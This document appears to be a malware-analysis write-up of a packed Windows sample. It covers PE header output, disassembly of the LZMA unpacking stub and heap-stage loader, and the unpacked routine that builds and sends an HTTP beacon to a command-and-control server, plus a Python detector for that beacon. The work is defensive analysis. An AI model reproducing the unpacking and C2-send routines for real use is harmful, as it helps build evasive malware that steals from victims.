Tools Required:
OllyDbg debugger.
OllyDump plugin.
ImpREC import fixer.
Filename: packed.exe

Before starting, we will dump the headers of the packed executable (packed.exe) and look at its structure, including the section headers. The tool for this is dumpbin, which ships as part of the Windows SDK:
dumpbin /all
Here is the output we get from dumpbin:
[plain]
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
Copyright (C) Microsoft Corporation.  All rights reserved.

Dump of file Sample

PE signature found

File Type: EXECUTABLE IMAGE

FILE HEADER VALUES
             14C machine (x86)
               4 number of sections
        51BD9FFA time date stamp Sun Jun 16 16:52:34 2013
               0 file pointer to symbol table
               0 number of symbols
              E0 size of optional header
             10F characteristics
                   Relocations stripped
                   Executable
                   Line numbers stripped
                   Symbols stripped
                   32 bit word machine

OPTIONAL HEADER VALUES
             10B magic # (PE32)
            7.02 linker version
            4000 size of code
             200 size of initialized data
               0 size of uninitialized data
           22000 entry point (00422000)
            1000 base of code
            5000 base of data
          400000 image base (00400000 to 00424B75)
            1000 section alignment
             200 file alignment
            5.01 operating system version
            0.00 image version
            5.01 subsystem version
               0 Win32 version
           24B76 size of image
             400 size of headers
               0 checksum
               2 subsystem (Windows GUI)
               3 DLL characteristics
                   RESERVED - UNKNOWN
                   RESERVED - UNKNOWN
          100000 size of stack reserve
            1000 size of stack commit
          100000 size of heap reserve
            1000 size of heap commit
               0 loader flags
              10 number of directories
               0 [       0] RVA [size] of Export Directory
           24A94 [      E2] RVA [size] of Import Directory
            6000 [   1B92C] RVA [size] of Resource Directory
               0 [       0] RVA [size] of Exception Directory
               0 [       0] RVA [size] of Certificates Directory
               0 [       0] RVA [size] of Base Relocation Directory
               0 [       0] RVA [size] of Debug Directory
               0 [       0] RVA [size] of Architecture Directory
               0 [       0] RVA [size] of Global Pointer Directory
               0 [       0] RVA [size] of Thread Storage Directory
               0 [       0] RVA [size] of Load Configuration Directory
               0 [       0] RVA [size] of Bound Import Directory
               0 [       0] RVA [size] of Import Address Table Directory
            22BC [      40] RVA [size] of Delay Import Directory
               0 [       0] RVA [size] of COM Descriptor Directory
            5000 [      71] RVA [size] of Reserved Directory

SECTION HEADER #1
   .text name
    4000 virtual size
    1000 virtual address (00401000 to 00404FFF)
     800 size of raw data
     400 file pointer to raw data (00000400 to 00000BFF)
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         Execute Read

SECTION HEADER #2
  .rdata name
     91E virtual size
    5000 virtual address (00405000 to 0040591D)
     200 size of raw data
     C00 file pointer to raw data (00000C00 to 00000DFF)
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
80000040 flags
         Initialized Data
         Write Only

SECTION HEADER #3
    .RES name
   1BA00 virtual size
    6000 virtual address (00406000 to 004219FF)
   19200 size of raw data
     E00 file pointer to raw data (00000E00 to 00019FFF)
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         Read Write

SECTION HEADER #4
  .RENOS name
    2B76 virtual size
   22000 virtual address (00422000 to 00424B75)
    2C00 size of raw data
   1A000 file pointer to raw data (0001A000 to 0001CBFF)
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
E0000040 flags
         Initialized Data
         Execute Read Write

  Summary

        3000 .RENOS
       1C000 .RES
        1000 .rdata
        4000 .text
[/plain]
The sections are .RENOS, .RES, .rdata and .text. The non-standard section names (.RENOS and .RES), together with an entry point inside the last section, are enough to show that the file was not produced by a standard compiler and was most probably processed by a packer or compressor.
The following is the output we get from debugger output at the entry point of the executable:
[plain]
00422000 >  68 00204200      PUSH OFFSET Sample.
00422005    B8 80204200      MOV EAX,Sample.00422080
0042200A    FFD0             CALL EAX
0042200C    83C4 04          ADD ESP,4
0042200F    B8 67224000      MOV EAX,Sample.00402267
00422014    FFE0             JMP EAX
00422016    2200             AND AL,BYTE PTR DS:[EAX]
[/plain]
The JMP EAX at 00422014 is where the stub transfers control to the original entry point of the executable (Sample.00402267). Before that, a call is made to Sample.00422080, which is presumably the routine that decompresses the original code.
Now let’s try to look into the subroutine:
[plain]
00422080   55                PUSH EBP
00422081   89E5              MOV EBP,ESP
00422083   57                PUSH EDI
00422084   56                PUSH ESI
00422085   53                PUSH EBX
00422086   83EC 2C           SUB ESP,2C
00422089   8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
0042208C   8078 7C 00        CMP BYTE PTR DS:[EAX+7C],0
00422090   0F85 64010000     JNZ Samplecc.004221FA
00422096   C745 E0 00000000  MOV DWORD PTR SS:[EBP-20],0
0042209D   8B40 6C           MOV EAX,DWORD PTR DS:[EAX+6C]
004220A0   8B08              MOV ECX,DWORD PTR DS:[EAX]
004220A2   394D E0           CMP DWORD PTR SS:[EBP-20],ECX
004220A5   8D58 04           LEA EBX,DWORD PTR DS:[EAX+4]
004220A8   894D E4           MOV DWORD PTR SS:[EBP-1C],ECX
004220AB   E9 8C000000       JMP Samplecc.0042213C
004220B0   8B4D 08           MOV ECX,DWORD PTR SS:[EBP+8]
004220B3   8D45 EC           LEA EAX,DWORD PTR SS:[EBP-14]
004220B6   8B51 20           MOV EDX,DWORD PTR DS:[ECX+20]
004220B9   894424 0C         MOV DWORD PTR SS:[ESP+C],EAX
004220BD   B8 04000000       MOV EAX,4
004220C2   894424 08         MOV DWORD PTR SS:[ESP+8],EAX
004220C6   8B43 08           MOV EAX,DWORD PTR DS:[EBX+8]
004220C9   894424 04         MOV DWORD PTR SS:[ESP+4],EAX
004220CD   8B03              MOV EAX,DWORD PTR DS:[EBX]
004220CF   8B79 70           MOV EDI,DWORD PTR DS:[ECX+70]
004220D2   01F8              ADD EAX,EDI
004220D4   890424            MOV DWORD PTR SS:[ESP],EAX
004220D7   FF12              CALL DWORD PTR DS:[EDX]
004220D9   8B55 08           MOV EDX,DWORD PTR SS:[EBP+8]
004220DC   8B03              MOV EAX,DWORD PTR DS:[EBX]
[/plain]
After analyzing the routine, we identified it as an LZMA decompression algorithm, which decompresses its data to 0x00401000, the start of the .text section.
The JMP EAX then lands at the original entry point, where the unpacked program starts executing:
[plain]
00402267  . 60               PUSHAD
00402268  . F8               CLC
00402269  . 1BFF             SBB EDI,EDI
0040226B  . 8B35 6C504000    MOV ESI,DWORD PTR DS:[40506C]        ; DBGHELP.ImageRvaToVa
00402271  . 68 5E534000      PUSH Samplecc.0040535E               ; /pModule = ""
00402276  . 832C24 40        SUB DWORD PTR SS:[ESP],40            ; |
0040227A  . FF15 38504000    CALL DWORD PTR DS:[405038]           ; GetModuleHandleA
00402280  . 96               XCHG EAX,ESI
00402281  . 09F7             OR EDI,ESI
00402283  . 2BC7             SUB EAX,EDI
00402285  . B9 0000FFFF      MOV ECX,FFFF0000
0040228A  . F7D9             NEG ECX
0040228C  . 3BC1             CMP EAX,ECX
0040228E  . 76 1F            JBE SHORT Samplecc.004022AF
00402290  . 46               INC ESI
00402291  . 56               PUSH ESI
00402292  . 59               POP ECX
00402293  . 1349 3B          ADC ECX,DWORD PTR DS:[ECX+3B]
00402296  . 68 60000000      PUSH 60
0040229B  . 83E9 85          SUB ECX,-7B
0040229E  . 5B               POP EBX
0040229F  . 3B19             CMP EBX,DWORD PTR DS:[ECX]
004022A1  . 73 0C            JNB SHORT Samplecc.004022AF
004022A3  . 33F6             XOR ESI,ESI
004022A5  . 81EE 1E534000    SUB ESI,Samplecc.0040531E            ; ASCII "DBGHELP.dll"
004022AB  . F7DE             NEG ESI
004022AD  .^EB A9            JMP SHORT Samplecc.00402258
004022AF  > B9 00040000      MOV ECX,400
004022B4  >-E2 FE            LOOPD SHORT Samplecc.004022B4
004022B6  . 61               POPAD
004022B7  . C3               RETN
[/plain]
The second phase of unpacking extracts binary code into a heap region, which can be seen here:
[plain]
003C00C4   5D                POP EBP                              ; 003C0694
003C00C5   5E                POP ESI
003C00C6   873424            XCHG DWORD PTR SS:[ESP],ESI
003C00C9   56                PUSH ESI
003C00CA   E8 31050000       CALL 003C0600
003C00CF   E8 6F050000       CALL 003C0643
003C00D4   8BF8              MOV EDI,EAX
003C00D6   6A 00             PUSH 0
003C00D8   6A 00             PUSH 0
003C00DA   FF75 6C           PUSH DWORD PTR SS:[EBP+6C]
003C00DD   57                PUSH EDI
003C00DE   FF55 28           CALL DWORD PTR SS:[EBP+28]
003C00E1   8B4D 70           MOV ECX,DWORD PTR SS:[EBP+70]
003C00E4   6A 00             PUSH 0
003C00E6   54                PUSH ESP
[/plain]
The decrypted bytes are copied into the heap region here (REP MOVS), and control is then passed into it through CALL DWORD PTR SS:[EBP+C]:
[plain]
003C0190   F3:AA             REP STOS BYTE PTR ES:[EDI]
003C0192   5F                POP EDI
003C0193   8BCB              MOV ECX,EBX
003C0195   F3:A4             REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
003C0197   FF55 0C           CALL DWORD PTR SS:[EBP+C]
[/plain]
Connection to the c2c server:
After unpacking, the following code builds the HTTP request with which the sample uploads information to, and downloads its configuration from, the c2c server:
[plain]
004035A0  |. FF75 AC         PUSH DWORD PTR SS:[EBP-54]          ; /<%s>
004035A3  |. FF75 FC         PUSH DWORD PTR SS:[EBP-4]           ; |<%s>
004035A6  |. FF75 B4         PUSH DWORD PTR SS:[EBP-4C]          ; |<%s>
004035A9  |. 68 00344000     PUSH 6fe5860a.00403400              ; |Format = "GET %s HTTP/1.0 Host: %s Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: %s "
004035AE  |. FF75 BC         PUSH DWORD PTR SS:[EBP-44]          ; |s
004035B1  |. E8 8ED50000     CALL 6fe5860a.00410B44              ; wsprintfA
004035B6  |. 83C4 14         ADD ESP,14
004035B9  |. EB 1B           JMP SHORT 6fe5860a.004035D6
004035BB  |> 68 BB474100     PUSH 6fe5860a.004147BB              ; /<%s> = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
004035C0  |. FF75 FC         PUSH DWORD PTR SS:[EBP-4]           ; |<%s>
004035C3  |. FF75 B4         PUSH DWORD PTR SS:[EBP-4C]          ; |<%s>
004035C6  |. 68 00344000     PUSH 6fe5860a.00403400              ; |Format = "GET %s HTTP/1.0 Host: %s Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: %s "
004035CB  |. FF75 BC         PUSH DWORD PTR SS:[EBP-44]          ; |s
004035CE  |. E8 71D50000     CALL 6fe5860a.00410B44              ; wsprintfA
004035D3  |. 83C4 14         ADD ESP,14
004035D6  |> 0FB745 D8       MOVZX EAX,WORD PTR SS:[EBP-28]
004035DA  |. 50              PUSH EAX
004035DB  |. 6A 00           PUSH 0
004035DD  |. FF75 FC         PUSH DWORD PTR SS:[EBP-4]
004035E0  |. E8 1EFAFFFF     CALL <Connect_to_c2c>
[/plain]
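The wsprintfA format string and the hard-coded User-Agent above are a usable network fingerprint for this sample: an HTTP/1.0 GET with a fixed header order, Accept-Encoding: identity, *;q=0 (it refuses compressed replies), Connection: close, and a User-Agent that claims MSIE 8.0 while carrying the Trident/5.0 token that real IE8 never sends (IE8 is Trident/4.0). The script below is an added detection example written for this writeup, not code from the original post; it parses two constructed sample requests (host, path and the browser request are placeholders I made up) and reports which of those indicators each one matches.

```python
import re

# Exact User-Agent the unpacked sample pushes at 004035BB (taken from the listing above)
HARDCODED_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"

# Header order produced by the wsprintfA format string at 6fe5860a.00403400
BEACON_HEADER_ORDER = ["host", "accept-language", "accept",
                       "accept-encoding", "connection", "user-agent"]

# Constructed sample requests (not captured traffic); host and path are placeholders
BEACON_REQUEST = (
    b"GET /placeholder-path HTTP/1.0\r\n"
    b"Host: c2.example.invalid\r\n"
    b"Accept-Language: en-US\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: identity, *;q=0\r\n"
    b"Connection: close\r\n"
    b"User-Agent: " + HARDCODED_UA.encode() + b"\r\n\r\n"
)
BROWSER_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.invalid\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/115.0\r\n"
    b"Accept: text/html,application/xhtml+xml\r\n"
    b"Accept-Language: en-US,en;q=0.5\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Connection: keep-alive\r\n\r\n"
)


def parse_request(raw):
    """Split an HTTP request head into (method, target, version, [(name, value), ...]).
    Header names are lower-cased; order is preserved because it is part of the fingerprint."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, version, headers


def beacon_indicators(raw):
    """Return the set of indicators a request shares with the sample's beacon format."""
    method, _target, version, headers = parse_request(raw)
    h = dict(headers)
    found = set()
    if method == "GET" and version == "HTTP/1.0":
        found.add("http-1.0-get")
    if h.get("user-agent") == HARDCODED_UA:
        found.add("hardcoded-user-agent")
    # Real IE8 reports Trident/4.0; "MSIE 8.0" combined with Trident/5.0 is self-inconsistent
    if re.search(r"MSIE 8\.0;.*Trident/5\.0", h.get("user-agent", "")):
        found.add("ua-version-mismatch")
    if h.get("accept-encoding") == "identity, *;q=0":
        found.add("refuses-compression")
    if [name for name, _ in headers] == BEACON_HEADER_ORDER:
        found.add("beacon-header-order")
    if h.get("connection", "").lower() == "close":
        found.add("connection-close")
    return found


def is_beacon(raw):
    """Strong match on the hard-coded UA or the exact header order; otherwise three weaker hits."""
    found = beacon_indicators(raw)
    strong = {"hardcoded-user-agent", "beacon-header-order"}
    return bool(found & strong) or len(found) >= 3


if __name__ == "__main__":
    for label, req in (("beacon", BEACON_REQUEST), ("browser", BROWSER_REQUEST)):
        print(f"{label:8} beacon={is_beacon(req)} {sorted(beacon_indicators(req))}")
```

The header order and the exact User-Agent are the strongest signals because they come straight out of the format string and the constant the binary pushes; Connection: close or HTTP/1.0 on their own are common enough in legitimate traffic that the example only counts them in combination.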
Inside Connect_to_c2c we can locate the call to send. The routine loops, advancing the data pointer (EDI) and decrementing the remaining size ([EBP+10]) after each successful call, and returns 1 in EAX once everything has been sent or 0 if send returns an error:
[plain]
00403087  /$ 55              PUSH EBP
00403088  |. 8BEC            MOV EBP,ESP
0040308A  |. 53              PUSH EBX
0040308B  |. 57              PUSH EDI
0040308C  |. 837D 10 00      CMP DWORD PTR SS:[EBP+10],0
00403090  |. 75 0B           JNZ SHORT 6fe5860a.0040309D
00403092  |. B8 01000000     MOV EAX,1
00403097  |. 5F              POP EDI
00403098  |. 5B              POP EBX
00403099  |. C9              LEAVE
0040309A  |. C2 0C00         RETN 0C
0040309D  |> 8B7D 0C         MOV EDI,DWORD PTR SS:[EBP+C]
004030A0  |. BB 00000000     MOV EBX,0
004030A5  |> 6A 00           /PUSH 0                             ; /Flags = 0
004030A7  |. FF75 10         |PUSH DWORD PTR SS:[EBP+10]         ; |DataSize
004030AA  |. 57              |PUSH EDI                           ; |Data
004030AB  |. FF75 08         |PUSH DWORD PTR SS:[EBP+8]          ; |Socket
004030AE  |. E8 33DB0000     |CALL 6fe5860a.00410BE6             ; send
004030B3  |. 85C0            |TEST EAX,EAX
004030B5  |. 7E 14           |JLE SHORT 6fe5860a.004030CB
004030B7  |. 03F8            |ADD EDI,EAX
004030B9  |. 2945 10         |SUB DWORD PTR SS:[EBP+10],EAX
004030BC  |. 837D 10 00      |CMP DWORD PTR SS:[EBP+10],0
004030C0  |. 75 07           |JNZ SHORT 6fe5860a.004030C9
004030C2  |. BB 01000000     |MOV EBX,1
004030C7  |. EB 02           |JMP SHORT 6fe5860a.004030CB
004030C9  |>^EB DA           JMP SHORT 6fe5860a.004030A5
004030CB  |> 8BC3            MOV EAX,EBX
004030CD  |. 5F              POP EDI
004030CE  |. 5B              POP EBX
004030CF  |. C9              LEAVE
004030D0  .  C2 0C00         RETN 0C
[/plain]